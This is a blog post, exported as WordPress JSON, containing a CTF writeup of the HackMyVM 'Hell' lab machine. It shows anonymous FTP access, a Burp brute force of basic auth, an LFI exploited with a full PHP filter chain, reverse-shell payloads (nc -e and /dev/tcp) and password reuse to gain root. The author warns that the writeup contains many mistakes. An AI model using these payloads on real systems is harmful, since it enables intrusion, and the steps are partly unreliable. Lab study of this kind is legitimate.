{"id":577,"date":"2024-04-17T05:45:52","date_gmt":"2024-04-16T21:45:52","guid":{"rendered":"http:\/\/162.14.82.114\/?p=577"},"modified":"2024-04-17T05:48:10","modified_gmt":"2024-04-16T21:48:10","slug":"hmv-_-hell","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/577\/04\/17\/2024\/","title":{"rendered":"hmv[-_-]Hell"},"content":{"rendered":"<h1>Hell<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170545692.png\" alt=\"image-20240417054512702\" \/><\/p>\n<p>The author left a <code>readme.txt<\/code>:<\/p>\n<pre><code class=\"language-text\">When booting the machine log in with the credentials: \nrun:run \n\nAnd execute the command:\nsudo run<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543084.png\" alt=\"image-20240410144056081\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543086.png\" alt=\"image-20240410144909217\" \/><\/p>\n<blockquote>\n<p>I strongly recommend following this blog: <a href=\"https:\/\/lander4k.github.io\/posts\/HMVM-Hell\/#preparaci%C3%B3n\">https:\/\/lander4k.github.io\/posts\/HMVM-Hell\/#preparaci%C3%B3n<\/a><\/p>\n<p>That author's script does the whole thing in one go, so elegant!<\/p>\n<\/blockquote>\n<p><strong>A note before you read: do not work through this while reading along. The writeup below has a small number of correct answers buried among a large number of mistakes, so be careful to tell them apart!<\/strong><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.3 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.3:21\nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack 
vsftpd 3.0.5\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:172.20.10.8\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.5 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0             256 Feb 16  2023 flag.txt\n22\/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 84:9f:33:ed:c5:e2:11:ff:20:7d:0e:d5:31:1a:f0:08 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKUt35mHiqmeX8Etve6CgCSeZwOi\/\/weJtS6LhYQqYW+AVf\/IFscFQ+TICAA6I3abQ5I9TU4n+\/cBC1BiJydGbI=\n|   256 b8:bc:0e:e3:84:af:21:ee:fb:cc:93:41:7d:9b:54:75 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILLBTRUCL9EquPItilTqvM8AEJIeAOJwUFCoN\/1F23wL\n80\/tcp open  http    syn-ack Apache httpd 2.4.52\n| http-auth: \n| HTTP\/1.1 401 Unauthorized\\x0D\n|_  Basic realm=Restricted Content\n|_http-title: 401 Unauthorized\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nService Info: Host: 172.17.0.2; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">Error: the server returns a status code that matches the provided options for non existing urls. http:\/\/172.20.10.3\/94a77ed1-68a1-41ba-83a0-15a21b74d601 =&gt; 401 (Length: 458). To continue please exclude the status code or the length<\/code><\/pre>\n<p>My guess was that a DNS name (virtual host) had been set up, so I tried another scanner to confirm:<\/p>\n<pre><code class=\"language-bash\">sudo dirsearch -u http:\/\/172.20.10.3 -e* -i 200,300-399 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt 2&gt;\/dev\/null<\/code><\/pre>\n<p>Ten percent of the wordlist in and nothing had turned up, so a DNS name must definitely have been added.<\/p>\n<h3>Vulnerability Scanning<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.3<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.3\n+ Target Hostname:    172.20.10.3\n+ Target Port:        80\n+ Start Time:         2024-04-10 02:53:21 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/ - Requires Authentication for realm &#039;Restricted Content&#039;\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ 8253 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-10 02:53:39 (GMT-4) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>Exploitation<\/h2>\n<h3>Reconnaissance [1]<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543087.png\" alt=\"image-20240410145428484\" \/><\/p>\n<p>So that was it.<\/p>\n<h3>Sensitive Ports<\/h3>\n<p>Try an FTP connection:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ ftp 172.20.10.3\nConnected to 172.20.10.3.\n220 (vsFTPd 3.0.5)\nName (172.20.10.3:kali): Anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||9073|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        115          4096 Feb 16  2023 .\ndrwxr-xr-x    2 0        115          4096 Feb 16  2023 ..\n-rw-r--r--    1 0        0              34 Feb 16  2023 .passwd\n-rw-r--r--    1 0        0             256 Feb 16  2023 flag.txt\n226 Directory send OK.\nftp&gt; get .passwd\nlocal: .passwd remote: .passwd\n229 Entering Extended Passive Mode (|||19197|)\n150 Opening BINARY mode data connection for .passwd (34 bytes).\n100% |***********************************************************************************************************|    34        1.92 KiB\/s    00:00 ETA\n226 Transfer complete.\n34 bytes received in 00:00 (1.87 KiB\/s)\nftp&gt; get flag.txt\nlocal: flag.txt remote: flag.txt\n229 Entering Extended Passive Mode (|||27611|)\n150 Opening BINARY mode data connection for flag.txt (256 bytes).\n100% |***********************************************************************************************************|   256      169.95 KiB\/s    00:00 ETA\n226 Transfer complete.\n256 bytes received in 00:00 (121.95 KiB\/s)\nftp&gt; exit\n221 Goodbye.\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ cat .passwd                       \n\nThe password is: webserver2023!<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543088.png\" alt=\"image-20240410145630922\" \/><\/p>\n<p>Ah, this.....<\/p>\n<h3>Capture and Brute Force [2]<\/h3>\n<pre><code class=\"language-http\">GET \/ HTTP\/1.1\nHost: 172.20.10.3\nCache-Control: max-age=0\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close<\/code><\/pre>\n<pre><code class=\"language-text\">YWRtaW46cGFzc3dvcmQ=\nadmin:password<\/code><\/pre>\n<p>Try brute-forcing the <code>basic<\/code> authentication with <code>burp<\/code>:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543089.png\" alt=\"image-20240410150853001\" \/><\/p>\n<p>Pick a better username wordlist for the brute force:<\/p>\n<pre><code class=\"language-bash\">\/usr\/share\/seclists\/Usernames\/Names\/names.txt<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543090.png\" alt=\"image-20240410151439741\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543091.png\" alt=\"image-20240410151520826\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543092.png\" alt=\"image-20240410151609391\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543093.png\" alt=\"image-20240410151649357\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543094.png\" alt=\"image-20240410151710594\" \/><\/p>\n<p>Run the brute force:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543095.png\" alt=\"image-20240410151751743\" \/><\/p>\n<pre><code class=\"language-text\">YmVpbHVsOndlYnNlcnZlcjIwMjMh\nbeilul:webserver2023!<\/code><\/pre>\n<p>Log in:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543096.png\" alt=\"image-20240410151907193\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543097.png\" alt=\"image-20240410151924527\" \/><\/p>\n<pre><code class=\"language-text\">Flag 2: HELL{BRUT3_F0RC3_M4Y_B3_4N_0P710N}<\/code><\/pre>\n<h3>LFI<\/h3>\n<p>While switching between profiles I noticed the URL was:<\/p>\n<pre><code class=\"language-bash\">http:\/\/172.20.10.3\/index.php?profile=s4vitar.html<\/code><\/pre>\n<p>Try LFI:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543098.png\" alt=\"image-20240410152221652\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543099.png\" alt=\"image-20240410152244261\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543100.png\" alt=\"image-20240410152321272\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543101.png\" alt=\"image-20240410152357902\" \/><\/p>\n<p>Try attacking with a PHP filter chain:<\/p>\n<pre><code class=\"language-bash\">python3 php_filter_chain_generator.py --chain &#039;&lt;?=`$_GET[0]` ?&gt;&#039;<\/code><\/pre>\n<pre><code 
class=\"language-bash\">php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.ico
nv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n<p>Give it a try:<\/p>\n<pre><code class=\"language-text\">payload&amp;0=whoami<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543102.png\" alt=\"image-20240410152750752\" \/><\/p>\n<p>That seems about right.... Reverse shell:<\/p>\n<pre><code class=\"language-bash\">payload&amp;0=nc -e \/bin\/bash 172.20.10.8 1234<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543103.png\" alt=\"image-20240410153009019\" \/><\/p>\n<pre><code class=\"language-bash\">payload&amp;0=bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;&amp;1&#039;<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543104.png\" alt=\"image-20240410153222480\" \/><\/p>\n<p>Still no shell came back; try encoding it:<\/p>\n<pre><code class=\"language-bash\">&amp;0=bash%20-c%20&#039;exec%20bash%20-i%20&amp;%3E\/dev\/tcp\/172.20.10.8\/1234%20%3C&amp;1&#039;<\/code><\/pre>\n<p>No good...<\/p>\n<pre><code class=\"language-bash\">&amp;0=id<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543105.png\" alt=\"image-20240410153533871\" \/><\/p>\n<p>What about encoding just the special characters?<\/p>\n<pre><code class=\"language-bash\">bash -c &#039;exec bash -i %26&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;%261&#039;<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543106.png\" alt=\"image-20240410153711901\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543107.png\" alt=\"image-20240410153702693\" \/><\/p>\n<p>It came through!!!!<\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering [3-4]<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@3dbb88a289e3:\/var\/www\/html$ ls\n0bfxgh0st.html  eddiedota.html  flag.txt            gatogamer1155.jpg  onyx.html  s4vitar.html  txhaka.html  xdann1.html\n0bfxgh0st.jpg   eddiedota.jpg   gatogamer1155.html  index.php          onyx.jpg   s4vitar.jpg   txhaka.jpg   xdann1.jpg\n(remote) www-data@3dbb88a289e3:\/var\/www\/html$ cd ..;ls -la\ntotal 16\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 ..\ndrwxr-xr-x 1 root root 4096 Feb 16  2023 html\n(remote) www-data@3dbb88a289e3:\/var\/www$ cd ..\n(remote) www-data@3dbb88a289e3:\/var$ ls -la\ntotal 56\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root  4096 Apr 10 00:40 
..\ndrwxr-xr-x 2 root root  4096 Apr 18  2022 backups\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 cache\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 lib\ndrwxrwsr-x 2 root staff 4096 Apr 18  2022 local\nlrwxrwxrwx 1 root root     9 Jan 25  2023 lock -&gt; \/run\/lock\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 log\ndrwxrwsr-x 2 root mail  4096 Jan 25  2023 mail\ndrwxr-xr-x 2 root root  4096 Jan 25  2023 opt\nlrwxrwxrwx 1 root root     4 Jan 25  2023 run -&gt; \/run\ndrwxr-xr-x 2 root root  4096 Jan 25  2023 spool\ndrwxrwxrwt 2 root root  4096 Jan 25  2023 tmp\ndrwxr-xr-x 1 root root  4096 Feb 15  2023 www\n(remote) www-data@3dbb88a289e3:\/var$ mail\nbash: mail: command not found\n(remote) www-data@3dbb88a289e3:\/var$ cd \/home\n(remote) www-data@3dbb88a289e3:\/home$ ls\n(remote) www-data@3dbb88a289e3:\/home$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Apr 18  2022 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/bash\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System 
(admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n(remote) www-data@3dbb88a289e3:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\n(remote) www-data@3dbb88a289e3:\/home$ cd \/tmp\n(remote) www-data@3dbb88a289e3:\/tmp$ ls -la\ntotal 8\ndrwxrwxrwt 1 root root 4096 Apr 10 00:40 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/tmp$ cd ..\n(remote) www-data@3dbb88a289e3:\/$ ls -la\ntotal 64\ndrwxr-xr-x   1 root root 4096 Apr 10 00:40 .\ndrwxr-xr-x   1 root root 4096 Apr 10 00:40 ..\n-rwxr-xr-x   1 root root    0 Apr 10 00:40 .dockerenv\nlrwxrwxrwx   1 root root    7 Jan 25  2023 bin -&gt; usr\/bin\ndrwxr-xr-x   2 root root 4096 Apr 18  2022 boot\ndrwxr-xr-x   5 root root  360 Apr 10 00:40 dev\ndrwxr-xr-x   1 root root 4096 Apr 10 00:40 etc\ndrwxr-xr-x   2 root root 4096 Apr 18  2022 home\nlrwxrwxrwx   1 root root    7 Jan 25  2023 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root    9 Jan 25  2023 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root    9 Jan 25  2023 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root   10 Jan 25  2023 libx32 -&gt; usr\/libx32\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 media\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 mnt\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 opt\ndr-xr-xr-x 241 root root    0 Apr 10 00:40 proc\ndrwx------   1 root root 4096 Feb 16  2023 root\ndrwxr-xr-x   1 root root 4096 Feb 15  2023 run\nlrwxrwxrwx   1 root root    8 Jan 25  2023 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root 4096 Jan 25  2023 srv\ndr-xr-xr-x  13 root root    0 Apr 10 00:40 sys\ndrwxrwxrwt   1 root root 4096 Apr 10 00:40 tmp\ndrwxr-xr-x   1 root root 4096 Jan 25  2023 usr\ndrwxr-xr-x   1 root root 4096 Feb 15  2023 var\n(remote) www-data@3dbb88a289e3:\/$ cd usr\/local\n(remote) www-data@3dbb88a289e3:\/usr\/local$ ls\nbin  etc  games  include  lib  man  sbin  
share  src\n(remote) www-data@3dbb88a289e3:\/usr\/local$ cd share\/\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ ls\nca-certificates  man\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ ls -la\ntotal 16\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root 4096 Jan 25  2023 ..\ndrwxr-xr-x 2 root root 4096 Feb 15  2023 ca-certificates\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 man\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ ls -F\nca-certificates\/  man\/\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share$ cd man\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/man$ ls\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/man$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 .\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 ..\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/man$ cd ..\/ca-certificates\/\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/ca-certificates$ ls\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/ca-certificates$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Feb 15  2023 .\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 ..\n(remote) www-data@3dbb88a289e3:\/usr\/local\/share\/ca-certificates$ cd \/opt\n(remote) www-data@3dbb88a289e3:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/opt$ cd ..\/mnt\n(remote) www-data@3dbb88a289e3:\/mnt$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Jan 25  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n(remote) www-data@3dbb88a289e3:\/mnt$ cd ..\n(remote) www-data@3dbb88a289e3:\/$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/var\/www\/html\/flag.txt\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/ping6\n\/usr\/bin\/ping<\/code><\/pre>\n<pre><code class=\"language-apl\">(remote) www-data@3dbb88a289e3:\/$ cat \/var\/www\/html\/flag.txt\n\n\u2588  
\u2003\u2588\u2580\u2580\u2003\u2588\u2003\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2588\u2580\u2580\n\u2588\u2584\u2584\u2003\u2588\u2580 \u2003\u2588\u2003\u2588\u2584\u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\n\nFlag 3: HELL{LF1_F1LT7R_CH41N_G3N3R4T0R}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543108.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543108.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410183108024\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>We can see that only the <code>root<\/code> and <code>www-data<\/code> users exist, so try the login password obtained earlier and see whether it has been reused:<\/p>\n<pre><code class=\"language-apl\">(remote) www-data@3dbb88a289e3:\/$ su root\nPassword: \nroot@3dbb88a289e3:\/# cd \/root\nroot@3dbb88a289e3:~# ls -la\ntotal 32\ndrwx------ 1 root root 4096 Feb 16  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 10 00:40 ..\n-rw------- 1 root root    5 Feb 16  2023 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 15  2021 .bashrc\ndrwxr-xr-x 1 root root 4096 Feb 15  2023 .local\n-rw-r--r-- 1 root root  161 Jul  9  2019 .profile\n-rw-r--r-- 1 root root  273 Feb 15  2023 .wget-hsts\n-rw-r--r-- 1 root root  272 Feb 16  2023 flag.txt\nroot@3dbb88a289e3:~# cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003 \u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003 \u2003\u2588\u2584 \u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580   \n\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003 \u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2584\u2003 \u2003\u2588 \u2580\u2588\u2003\u2588\u2584\u2588\u2003 \u2588   \n\nFlag 4: HELL{CR3D3NT14LS_1N_HTP455WD_3H?}\n\nroot@3dbb88a289e3:~# cat .bash_history \nexit<\/code><\/pre>\n<p>Upload linpeas.sh, fscan and pspy64.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543109.png'><img class=\"lazyload lazyload-style-2\" 